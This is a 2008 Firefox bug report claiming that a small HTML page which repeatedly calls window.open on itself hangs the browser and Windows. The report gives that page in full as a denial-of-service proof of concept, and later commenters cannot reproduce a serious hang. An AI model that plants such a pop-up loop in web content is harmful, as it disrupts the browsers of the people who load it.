466154 - Firefox hangs and does not respond and it leads to Windows hanging and not responding if you use the Javascript method "open".

Status: RESOLVED WORKSFORME

(Firefox :: Security, defect)

Description

[Oleksandr Heneralov]

User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4

If there is some web page entitled "crash.html" which has the following source code:
<html>
<head>
<title>MSIE browser entrapment vulnerability #3 demo</title>
</head>
<body >
<script>
open("crash.html","hello");
</script>

</body>
</html>
and if you run this web page it leads to a very serious problem - Windows halts and does not respond. Only restarting can help. It can be used by hackers.

Reproducible: Always

Steps to Reproduce:
1.create the web page with the code <html>
<head>
<title>MSIE browser entrapment vulnerability #3 demo</title>
</head>
<body >
<script>
open("crash.html","hello");
</script>

</body>
</html>
2. Run this page.
3. Wait several seconds.
Actual Results:  
Windows stops responding.

Expected Results:  
Normal functioning of Windows. Firefox should not hang.

Comment 1

[Ria Klaassen (not reading all bugmail)]

I am not able to reproduce this on Windows XP using Firefox 3 and latest trunk.
In a recent Firefox 2 version however I can reproduce a kind of hang but this needs an explicit approval to allow pop-ups from this site. It's not a serious hang; after a few seconds the windows close button reacts to the click and I can close the browser normally.

Comment 2

[Matthias Versen [:Matti]]

Do you get this in the Firefox safemode ?

Comment 3

[Wayne Mery (:wsmwk)]

WFM with Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1b3) Gecko/20090305 Firefox/3.1b3